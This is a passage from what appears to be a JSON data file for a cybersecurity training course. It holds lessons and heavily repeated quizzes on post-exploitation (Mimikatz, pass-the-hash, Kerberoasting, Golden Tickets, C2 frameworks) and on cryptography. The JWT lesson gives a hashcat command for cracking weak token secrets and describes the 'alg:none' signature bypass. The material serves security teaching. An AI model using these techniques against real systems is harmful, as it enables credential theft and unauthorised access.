finding."},{"type":"quiz","q":"Registry Run key executes...","opts":["Never","Every time the user logs in","Only once","On reboot only"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"cr-encoding-vs-encryption","cat":"Cryptography","title":"Encoding vs Encryption vs Hashing","diff":1,"xp":50,"intro":"Three different things that people constantly confuse.","sections":[{"type":"text","content":"Encoding transforms for compatibility (Base64, URL). Encryption transforms for confidentiality (AES, RSA \u2014 needs a key). Hashing transforms for integrity (SHA256 \u2014 one-way, no key)."},{"type":"code","lang":"bash","content":"# Encoding (reversible, no key)\necho 'hello' | base64  # aGVsbG8K\n# Encryption (reversible, needs key)\nopenssl enc -aes-256-cbc -in file -out encrypted -k secret\n# Hashing (irreversible, no key)\necho -n 'hello' | sha256sum"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"The key difference between encoding and encryption is...","opts":["Speed","Encryption requires a key, encoding doesn't","Output size","They're the same"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-ssl-tls-versions","cat":"Cryptography","title":"SSL/TLS Version History","diff":1,"xp":75,"intro":"From SSLv2 to TLS 1.3 \u2014 understand what's deprecated and why.","sections":[{"type":"text","content":"SSLv2/SSLv3: broken (POODLE). TLS 1.0/1.1: deprecated. TLS 1.2: current minimum. TLS 1.3: modern standard (fewer round trips, better ciphers)."},{"type":"code","lang":"bash","content":"# Check supported versions\nnmap --script ssl-enum-ciphers -p 443 target.com\ntestssl.sh target.com\n# Force specific version\nopenssl s_client -connect target.com:443 -tls1_2"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"The current minimum acceptable TLS version is...","opts":["SSLv3","TLS 1.0","TLS 1.2","TLS 1.3"],"ans":2},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-password-storage","cat":"Cryptography","title":"Secure Password Storage","diff":1,"xp":75,"intro":"How passwords should be stored \u2014 and how they usually aren't.","sections":[{"type":"text","content":"Never store plaintext or reversible encryption. Use: bcrypt, scrypt, or Argon2 with unique salt per password. MD5/SHA alone is catastrophically weak."},{"type":"code","lang":"bash","content":"# BAD: MD5 hash (fast, no salt)\nmd5(password)\n# BAD: SHA256 (fast, even with salt)\nsha256(salt + password)\n# GOOD: bcrypt (slow, auto-salted)\nbcrypt.hashpw(password, bcrypt.gensalt(rounds=12))\n# BEST: Argon2id (memory-hard)\nargon2id(password, salt, t=3, m=65536, p=4)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"bcrypt is better than SHA256 for passwords because...","opts":["It produces longer hashes","It's deliberately slow (resistant to brute-force)","It's newer","It uses less memory"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-key-exchange","cat":"Cryptography","title":"Key Exchange Protocols","diff":2,"xp":150,"intro":"How two parties agree on a shared secret securely.","sections":[{"type":"text","content":"Diffie-Hellman, ECDH, and RSA key exchange each have different security properties. DH/ECDH provide forward secrecy (past traffic can't be decrypted if long-term key is compromised)."},{"type":"code","lang":"bash","content":"# Perfect Forward Secrecy means:\n# Each session uses ephemeral keys\n# Compromising the long-term key doesn't decrypt past sessions\n# TLS 1.3 REQUIRES forward secrecy\n# Check: openssl s_client -connect target.com:443 | grep 'Cipher'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Forward secrecy means...","opts":["Faster encryption","Past traffic stays safe even if the long-term key is compromised","Stronger passwords","Better compression"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-jwt-structure","cat":"Cryptography","title":"JWT Structure and Attacks","diff":2,"xp":150,"intro":"Header.Payload.Signature \u2014 understand to attack.","sections":[{"type":"text","content":"JWTs are three Base64-encoded JSON objects. The signature prevents tampering, but: algorithm confusion, weak secrets, and 'none' algorithm attacks break it."},{"type":"code","lang":"bash","content":"# Decode a JWT\necho 'eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature' | cut -d. -f2 | base64 -d\n# Crack weak HMAC secret\nhashcat -m 16500 jwt.txt rockyou.txt\n# Algorithm none attack\n# Change header to {\"alg\":\"none\"}, remove signature"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"JWT 'alg:none' attack works when...","opts":["The server uses RS256","The server doesn't validate the algorithm field","The secret is strong","The token has expired"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-certificate-analysis","cat":"Cryptography","title":"X.509 Certificate Analysis","diff":2,"xp":150,"intro":"Parse and validate SSL/TLS certificates.","sections":[{"type":"text","content":"Certificates contain: subject, issuer, validity dates, public key, SANs, key usage, and the signature. Verify the chain from leaf to root CA."},{"type":"code","lang":"bash","content":"# View certificate details\nopenssl x509 -in cert.pem -text -noout\n# Check chain\nopenssl verify -CAfile ca-bundle.crt cert.pem\n# Download and view remote cert\necho | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -text"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"A certificate chain is valid when...","opts":["The leaf cert is self-signed","Each cert is signed by the next cert's key, up to a trusted root CA","All certs have the same key","The chain is short"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cryptanalysis-basics","cat":"Cryptography","title":"Cryptanalysis Fundamentals","diff":3,"xp":200,"intro":"Break ciphers: frequency analysis, known plaintext, chosen plaintext attacks.","sections":[{"type":"text","content":"Cryptanalysis categorized by what the attacker knows: ciphertext-only (hardest), known-plaintext (has some pairs), chosen-plaintext (can encrypt arbitrary text), chosen-ciphertext."},{"type":"code","lang":"bash","content":"# Frequency analysis (substitution ciphers)\n# Count letter frequencies in ciphertext\n# Compare to English letter frequencies (E=12.7%, T=9.1%, A=8.2%)\npython3 -c 'from collections import Counter; c=Counter(open(\"cipher.txt\").read().upper()); print(c.most_common(10))'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Chosen-plaintext attack means the attacker can...","opts":["Only observe ciphertext","Encrypt arbitrary plaintext and observe the ciphertext","Decrypt arbitrary ciphertext","Access the key"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange 